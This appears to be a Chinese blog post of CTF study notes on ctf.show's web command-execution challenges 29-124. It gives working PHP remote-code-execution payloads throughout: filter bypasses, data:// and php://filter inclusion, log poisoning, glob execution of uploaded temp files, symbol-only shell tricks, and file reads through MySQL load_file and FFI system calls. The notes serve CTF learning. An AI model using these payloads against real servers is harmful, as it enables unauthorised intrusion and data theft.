ctf_show笔记篇(web入门---命令执行)

最新推荐文章于 2024-04-15 03:28:03 发布
最新推荐文章于 2024-04-15 03:28:03 发布
阅读量1.5k 收藏 19
点赞数 16
分类专栏: ctf.show web题 文章标签: 笔记 前端 android ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/136419279
版权

 

目录

 

命令执行

29:有很多种方法可以使用内联法例如system('cat `ls`')或者像它提示的一样echo `nl fl""ag.php`

30:这里与29题原理相同只不过多禁用了一个system和php####请通过29题举一反三

31:这一题有多种解法看自身理解,答案不唯一

32:这一题还是一样多种解法这里演示两种

33-36:同样还是使用文件包含就能过,($_GET[参数],这里的参数可以是数字或者字母带小飘或者不带小飘,例如:'a'和a)

37-39:这一题用伪协议随便过(简单的文件包含)

40:通过他的正则能直到只能使用类似于abc()这样的类型进行注入,明显的无参数注入

41:这里建议去看这篇博文,光看payload直接拿flag学不到东西,先理解原理在结合羽师傅给的脚本分析然后自己写一个脚本

42-52:全都是和隔断相关的,如果不隔断他会和 >/dev/null直接丢到垃圾桶相当于是

53:还是同样的直接c""at${IFS}fl""ag.p""hp

54:这里就要用点骚操作了,用绝对路径来调用cat函数,例如/bin/?at,或者ca?,再或者改名再查看,复制也行。反正就是你能想到怎么绕过就去做,解法不唯一

55:两种解法

56:可用55题的第二方法解开

57:应该是想让了解linux的运算符

58-65:这集体将命令执行的权限禁用了,例如system这一类执行命令的都不行

66:这里将flag换了个地方

67:这里把print_r和show_source禁用了

68:这里又把highlight_file禁用了

69:这里又禁用了var_dump

70:和69一样但是禁用了其他的东西

71:从源代码看,这里开启了缓冲区

72-74:到这里似乎就禁止进行文件扫描了

75:这里学到了一个新方法

76:这里使用php的另一个模块连接mysql

77:这里使用的是只有php7.4以上才有的模块ffi

118:这里学到了新东西,关于linux的一些特殊的变量,例如环境变量

119:和118大致也是同理,通过利用系统的变量来做题

120:和前两题一样只不过把过滤写出来了(可举一反三)

121:也是一样的只是把USER和其他的也禁用了

122:

124:

命令执行

29:有很多种方法可以使用内联法例如system('cat `ls`')或者像它提示的一样echo `nl fl""ag.php`

nl和cat的区别就是nl会列出文件内容并且带有行号

30:这里与29题原理相同只不过多禁用了一个system和php####请通过29题举一反三

31:这一题有多种解法看自身理解,答案不唯一

get嵌套

利用了eval()函数再写了一个$_GET['s']来接受变量,这样可以完全绕过所有验证

最后payload:c=eval($_GET['s']);&s=system('cat flag.php')

passthru()虽然system被禁用了但是还有很多可以调用系统命令的函数

例如:exec,shell_exec(),popen()之类的,可自行尝试

pyload:

c=passthru("c\at\$IFS\$1fla*");

最后还可以使用无参数rce,就像给的提示一样

32:这一题还是一样多种解法这里演示两种

第一种通过include包含文件

payload:

c=include$_GET["a"]?>&a=data://text/plain,<?php%20eval(system("cat%20flag.php"));?>

这个符号?>是应为防护里过滤了;符号,所以我们直接将后面的代码全部不要了直接闭合

例如:

<?php include$_GET["a"]?>preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c));?>

a后面使用的是伪协议也可以使用php://filter/read=convert.base64-encode/resource=flag.php

其他的伪协议也可以使用

第二种利用系统的日志文件写入代码然后访问利用(!!!这里的前提是可以访问到日志)

payload:

c=include$_GET["a"]?>&a=../../../../var/log/nginx/access.log

先随便刷新然后写入代码让日志文件记住

然后再刷新再写入我们包含日志文件的代码

bp抓包在user—agent写入代码

原理:日志文件会自动收集user—agent的信息,然后通过文件包含include命令来引用日志文件。

33-36:同样还是使用文件包含就能过,($_GET[参数],这里的参数可以是数字或者字母带小飘或者不带小飘,例如:'a'和a)

37-39:这一题用伪协议随便过(简单的文件包含)

例如:data://text/plain;base64,base64加密后的命令

如果传入参数后会有自动添加点东西可用//注释掉###如果有影响才会去注释它

例如:?c=data://text/palin,<?php%20eval(system(%27cat%20`ls`%27));?>//

40:通过他的正则能直到只能使用类似于abc()这样的类型进行注入,明显的无参数注入

例子:

1.eval(implode(getallheaders()))

函数getallfeaders函数获取全部传入的head信息但是返回的是数组,而eval只能接收字符串,所以需要用implode转化为字符串,

例如:

php版本不同getallheaders读取的顺序也会不同,这里的环境是从最后读取的,所以在最后加上了//来注释掉后面的head信息

2.show_source(next(array_reverse(scandir(pos(localeconv())))));

1)函数localeconv会返回一包含本地数字及货币格式信息的数组,这里主要是他返回的第一个字符串“  .  ”

2)pos函数可以输出数组里的第一个值,刚好可以拿来读localeconv返回的数组的第一个值“ . ”

3)scandir函数返回指定目录中的文件和目录的数组,因为pos(localeconv())两个函数结合起来输出刚好是“ . ”,所以scandir(.)扫的是当前目录

4)array_reverse翻转数组,就是将scandir扫的目录返回的数组倒过来

5)next()将数组指针指向下一个

6)show_source查看源码

41:这里建议去看这篇博文,光看payload直接拿flag学不到东西,先理解原理在结合羽师傅给的脚本分析然后自己写一个脚本

#大致意思就是通过php的这四个运算符来构造新的字符串来执行命令

RCE篇之无数字字母rce - 学安全的小白 - 博客园 (cnblogs.com)

原理:

异或^:数字相同为1不同为0(1^1=1,1^0=0),利用这个特性来构造字符串

例如:'a'^'$'=E

按位或运算|:参与运算的两个数转化为二进制后,全为1则取1,如果是1和0这种还是取1

例如:101|100=101        101|101=101    100|100=100

按位与运算&:参与运算的两个数转化为二进制后,全为1则取1,存在0时取0

例如:101&100=100        101&101=101       100&100=100

42-52:全都是和隔断相关的,如果不隔断他会和 >/dev/null直接丢到垃圾桶相当于是

####这些题出出来估计是为了加强记忆用的

  1. 隔断可以用%0a或者||之类的都可以
  2. 空格绕过:$IFS  $IFS$随便一个数字  ${IFS}  %09  %20  <  <>###这最后两个是重定向符号,因起原理也可以用来当作空格使用
  3. 查看文件:cat  tac(倒过来读取文件)  nl(显示的时候顺便输出行号)  sort(可以查看)  head(读取前几行)  more(一页一页的读取也可以用来查看)  uniq(可以查看)  less  tail  od

53:还是同样的直接c""at${IFS}fl""ag.p""hp

54:这里就要用点骚操作了,用绝对路径来调用cat函数,例如/bin/?at,或者ca?,再或者改名再查看,复制也行。反正就是你能想到怎么绕过就去做,解法不唯一

payload:/bin/?at${IFS}f???????            ca?${IFS}fla?.php           mv${IFS}fla?.php${IFS}1.txt然后ca?${IFS}1.txt          

55:两种解法

1.看过payload后直到的一种骚操作,但是有局限性

利用/bin/base64加密文件然后会输出的特性,这里的前提是可以输数字

payload:/???/????64 ????????

2.另一种是通过上传文件然后用符号.调用执行文件

#####一种很新奇的解题方式

第一个知识点:

通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符      /tmp/php??????

这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大写的情况

例如:

普通文件/tmp/adcabcabc

php保存的临时文件/tmp/phpAvxAsa

第二个知识点:

现在直到了文件上传的位置以及特性那么现在要怎么利用它

  1. shell下支持使用. 来执行文件
  2. linux支持glob通配符代替文件名

例如我们需要利用到/tmp/phpFsGFKd这个文件,他和其他文件的区别就是php保存的临时文件会有大写字母的出现,而glob支持利用[0-9]来表示一个范围,这就很好的解决了问题,

可以使用[@-[]这两个字符之间真好是全部大写字母,放在最后正好可以用来匹配文件名最后出现了大写字母的文件

payload:.%20/???/????????[@-[]

完整流程

用html写一个提交post文件的页面

例如:

56:可用55题的第二方法解开

57:应该是想让了解linux的运算符

想了解更详细可以去看这篇博文

linux之${ }、[ ]、$( )、$[ ]、$(( ))、[[ ]]、(( ))的作用_linux $[]-CSDN博客

这里flag放在36里面,但是数字被禁掉

在linux里$(())是运算符,例如:$((1+2))=3      如果$(())这样用他会算出0

而~是取反符号如果这样用,例如:~$((1+2))= -4      如果$(())返回0的话~$(())这样用就会返回-1

例子:

$((~$(())~$(())))=$((-1-1))= -2         ~$((~$(())~$(())))=~$((-1-1))=1

转化为负数会减少一位,那么按照这个原理在里面放37个~$(())然后再用$(())包裹起来就会得到36

payload:?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

58-65:这集体将命令执行的权限禁用了,例如system这一类执行命令的都不行

####这里每一题基本都是一样的,可以尝试多种不同的无参数rce,或者include文件包含这一类

方案一(include文件包含):

c=include($_POST['a']);&a=php://filter/read=convert.base64-encode/resource=flag.php

或者####在没有过滤参数c的情况下

c=include('flag.php');

方案二(使用php内置函数):

  1. show_source()    highlight_file():
    show_source('flag.php');        highlight_file('flag.php');
    这两个函数都是用来高亮显示文件内容

66:这里将flag换了个地方

var_cump(scandir('/'));

67:这里把print_r和show_source禁用了

这里使用var_dump()替换print_r

var_dump(scandir('/'));扫描根目录文件并输出

highlight_file('/flag.txt');读取文件

68:这里又把highlight_file禁用了

不能显示文件可以使用var_dump输出变量信息

var_dump(scandir('/'));扫描文件

这里用文件包含绕过

c=include('/flag.txt')

69:这里又禁用了var_dump

可以用echo替换,但是echo只能输出字符串,所以使用implode将数组转换为字符串

c=echo(implode('!',scandir('/')));使用!来隔开每个文件名,不然黏在一起的

c=include('/flag.txt');

70:和69一样但是禁用了其他的东西

71:从源代码看,这里开启了缓冲区

ob_get_contents返回内部缓冲区内容

ob_end_clean则会清除缓冲区内容并且关闭

方案一:退出缓冲区以后后面它的命令就不会执行

提前退出缓冲区不让他进去###ob_end_flush释放内部缓冲区的内容,并关闭缓冲区

c=echo(implode('~~~',scandir('/')));ob_end_flush();

c=include('/flag.txt');ob_end_flush();

方案二:

执行完我们的程序后直接结束

c=echo(implode('~~~',scandir('/')));exit();

c=include('/flag.txt');exit();

72-74:到这里似乎就禁止进行文件扫描了

这里通过搜索资料学到的新东西

关于php的DirectoryIterator迭代器

  1. DirectoryIterator迭代器大概就是一个遍历目录的一个php的库,它可以指定需要遍历的文件然后给一个变量
  2. 然后通过foreach函数一个一个交给另一个变量,就从数组变成了字符串
  3. 可以使用很多关于文件信息的函数,例如下图的isdir()就是判断给定的文件是否是一个目录
  4. 最后在通过方法名来输出,例如下图的getFilename()获取当前Iterator item文件名(带扩展名)

这里列出一些常用的信息名以及方法名

信息名:

file_exists()该文件是否存在    is_dir()该文件是否是一个目录    is_file()该文件是否是一个正常文件

方法名:

getPathname()获取当前itorator item路径名

getFilename()获取当前itorator itrm文件名带拓展名

getPath()获取当前itorator itrm的路径名

payload:###glob://用来查找匹配文件路径的

?><?php
$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
echo($f->getFilename().'  ');
} 
exit(0);
?>

75:这里学到了一个新方法

这一题include被限制了,而uaf poc因为strlen被禁了获取不到system地址也没法用

首先还是使用DirectoryIterator模块来扫描目录

?><?php
$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
echo($f->getFilename().'  ');
} 
exit(0);
?>

这里就用到了数据库的load_file来查询了

首先连接数据库

$conn = mysqli_connect("127.0.0.1", "root", "root", "ctftraining");

                                        本地服务器  用户名   密码   数据库名称

设置sql语句

$sql='select load_file("/flag36.txt")';

执行sql语句并且使用变量result接收

$result = mysqli_query($conn, $sql);

最后使用mysqli_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有 返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false。

while($ccc=mysqli_fetch_array($result){ echo $ccc['a']; } exit();

最后payload:

$conn = mysqli_connect("127.0.0.1", "root", "root", "ctftraining"); $sql='select load_file("/flag36.txt") as a'; $result = mysqli_query($conn, $sql); while($ccc=mysqli_fetch_array($result){ echo $ccc['a']; } exit();

76:这里使用php的另一个模块连接mysql

 首先还是使用DirectoryIterator模块来扫描目录

?><?php
$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
echo($f->getFilename().'  ');
} 
exit(0);
?>

PHP 数据对象 (PDO) 扩展为PHP访问数据库定义了一个轻量级的一致接口。

PDO 提供了一个数据访问抽象层,这意味着,不管使用哪种数据库,都可以用相同的函数(方法)来查询和获取数据。

PDO随PHP5.1发行,在PHP5.0的PECL扩展中也可以使用,无法运行于之前的PHP版本。

try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

77:这里使用的是只有php7.4以上才有的模块ffi

FFI提供了高级语言直接的互相调用,而对于PHP而言,FFI让我们可以方便的调用C语言写的各种库。

其实现有大量的PHP扩展是对一些已有的C库的包装,某些常用的mysqli,curl,gettext等,PECL中也有大量的类似扩展。

$ffi = FFI::cdef("int system(const char *command);");//创建一个system对象
$a='/readflag > 1.txt';//没有回显的
$ffi->system($a);//通过$ffi去调用system函数

最后在去访问1.txt

118:这里学到了新东西,关于linux的一些特殊的变量,例如环境变量

payload:${PATH:~A}${PWD:~A}$IFS????.???

                这里猜测${PATH:~A}${PWD:~A}应该是是拿取的nl之类的读取文件的函数

  1. ${PATH:~A}有点类似于python里的元组或者集合,或者说是字典
    例如:
    a =’ 1234‘
    ${a:~A}这样就可以取出最后一个字符4或者${a:1}就会从第二个取出来到最后一个或者${a:2:4}就会取出第3个到第5个,(起始位标是0)
  2. PATH:环境变量的一种,${PATH:~A}的意思大致就是取PATH环境变量的最后一个字符
    例如:
  3. PWD:也是一种环境变量,他会一直显示当前所在的目录
    例如:

119:和118大致也是同理,通过利用系统的变量来做题

119题是把环境变量path禁用了,所以这里用其他的

这里的思路:

直接构造cat函数的绝对路径来利用cat读取flag.php

payload:

${PWD:${#}:${#SHLVL}}???${PWD:${#}:${#SHLVL}}??${HOME:${#HOSTNAME}:${#SHLVL}} ????.???

大致意思:

${PWD:${#}:${#SHLVL}}    >        ${PWD:1:1}      >        /        (${#}=1,${#SHLVL}=1)

${HOME:${#HOSTNAME}:${#SHLVL}}   >    

  1. ${#}:输出0         ${##}和${#?}:输出1          (只能计算这两个再多都会置零)
  2. ${#IFS}=3    (在linux里$IFS占三位,mac占四位)
  3. $HOME:家目录的环境变量
  4. $SHLVL:这里的shell只有一层嵌套所以是1
    SHLVL记录了bash Shell嵌套的层次,当启动第一个Shell时, $SHLVL=1,如果在这个Shell中执行脚本,脚本中的SHLVL为2,如果脚本再执行子脚本,子脚本中的SHLVL就变为3了。
  5. ${#PATH}:会计算PATH里的长度,类似于python里的len函数
  6. {}:应该是计算符
  7. $USER:当前用户吧

120:和前两题一样只不过把过滤写出来了(可举一反三)

payload:

${PWD::${##}}???${PWD::${##}}?${USER:~A}?$IFS????.???

####我的环境$USER是root,ctfshow的不是所以这里是正常的

121:也是一样的只是把USER和其他的也禁用了

首先通过它之前的关卡可以直到他的$PWD显示的当前路径是:/var/www/html

这里可以用到里面的r

payload:

${PWD::${##}}???${PWD::${##}}${PWD:${#IFS}:${#?}}??$IFS????.???

这里利用的是/bin/rev和tac的作用差不多,倒过来查,利用python跑脚本就能倒过来,其他的也行

122:

这里通过$?来实现,当上一条命令执行结束后的并且成功$?=0,如果失败则$?=1,所以这次需要多次刷新来实现$?=${##}=1

payload:

code=<A;${HOME::$?}???${HOME::$?}?????${RANDOM::$?} ????.???

<A;这个使用来让他第一条命令执行失败的

$RANDOM会生成随机数,每一次使用都不一样,这里我们要利用的是base64,所以需要刷新很多次直到${RANDOM::$?}取到4

124:

payload:

/?c=$cos=base_convert(37907361743,10,36)(dechex(1598506324));$$cos{1}($$cos{2})&1=system&2=cat+flag.php

怪兽不会rap_哥哥我会crash
关注
  • 16
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow 命令执行 web119
Kradress的博客
12-06 300
目录源码思路题解总结 源码 输入源码 思路 检查过滤 import requests import string url = "http://ceee6bb5-ecd8-4ff1-923e-30e6d10767ec.challenge.ctf.show/" list = string.ascii_letters+string.digits+"$+-#}{_><:?*.~/\\ " white_list = "" for payload in list: data = {
CTFShow Web入门_爆破
qq_19533763的博客
04-01 1094
Web21 随便输入抓包 发现Base64加密 账号和密码用:隔开 使用BP构造payload爆破 下载官方提供的字典 把后缀名改为.zip即可打开 使用Custom iterator模式 第一部分 第二部分 第三部分使用字典 添加base64加密 关闭url编码 爆破完按length排序查看最小的回包 Web22 子域名爆破,爆破ctf.show 最终在vip.ctf.show的源码发现了flag Web23 error_reporting(0); include('fla
ctfshow 命令执行
m0_74097148的博客
05-21 3470
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
小白刷题CTF show web方向,满满干货指导
m0_63174529的博客
04-09 321
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!一些笔者自己买的、其他平台白嫖不到的视频教程。
ctfshow web入门web119-124
m0_62207170的博客
04-14 545
ctfshow web入门web119-124
ctfshow学习记录-web入门命令执行119-122&124)
龟速更新的九某人
06-29 791
ctfshow学习记录-web入门命令执行web119-122&124)
ctfshow web入门 命令执行 web29~web77 web118~web124
qq_62989306的博客
09-13 2040
eval函数实现RCE、文件包含通过data协议实现RCE、eval函数无数字字母实现RCE、system函数绕过>/dev/null 2>&1实现RCE、system函数各种骚操作实现RCE。无参数RCE、无数字字母RCE、绕过open_basedir、PDO连接数据库load_fiel读取文件、利用FFI调用C库的system函数、环境变量……
可编程控制器_S7-1500_S7-1500编程入门_
10-01
S7-1500新手入门文档,包含组态、编程、选型,调试的一些经验分享
ctf_walkthrough:捕获标志-演练
02-15
夺旗-演练在“捕获标志”(CTF)中,“标志”是隐藏在有目的漏洞的程序或网站中的秘密。 参赛者从其他参赛者(进攻/防守风格的CTF)或组织者那里窃取旗帜。 存在几种变体,包括在硬件设备中隐藏标志。 安全CTF通常被...
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTFshow-PWN入门-前置基础-全
weixin_63576152的博客
07-31 3171
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1847
ctfshow pwn入门-前置基础pwn13-pwn19
CTFshow 1-10关
weixin_62369433的博客
11-11 2146
CTFshow 1-10 通关详解
ctfshow(菜狗杯)
qq_62046696的博客
11-28 5697
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTF show web入门 信息搜寻
qq_52429415的博客
03-03 617
CTF show web入门 信息搜寻 目录web1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web19 web1 进入后按F12看源代码 web2 进入网址,发现不能按F12,按ctrl+U查看源代码 web3 发现提示(没思路的时候抓个包看看) 根据提示进行抓包 web4 在题目中发现提示(后台地址写入robots) 访问robots输入robots.txt 访问flagi
ctf_show笔记web入门---代码审计)
whale_waves的博客
03-13 1084
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。
ctf-show WEB板块(持续更新),2024年最新秀出天际
最新发布
2301_82242296的博客
04-15 939
需要自己传上去的文件与已存在的key.dat MD5要一致,sha512不一致,那么我们的思路是,首先获得key.dat,首先访问一下这个文件直接下载了,那么第一层的绕过我们直接就使用了key.dat文件,第二层的sha1值我们随便上传一个字符串即可,我们需要并发编程,将$receiveFile中的内容在极短时间内进行替换,这里我们可以编写一个python脚本来进行解题。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资区间6k-15k。
CTFHub 命令注入-无过滤
07-25
CTFHub 命令注入-无过滤是一个题目,它的源代码中存在一个命令注入漏洞。在这个题目中,用户可以通过输入IP地址执行ping命令。\[1\]由于没有采用过滤,用户可以直接进行命令拼接,例如输入"192.168.43.222;ls"可以查看目录下的全部文件。\[2\]在这个题目中,flag被隐藏在网页源代码中。\[3\]为了防止命令注入漏洞,可以对用户输入进行过滤,例如过滤空格。 #### 引用[.reference_title] - *1* *2* [CTFHub -技能树 命令注入-无过滤](https://blog.csdn.net/qq_45653588/article/details/107556087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFhub——命令执行](https://blog.csdn.net/qq_43277152/article/details/113649643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值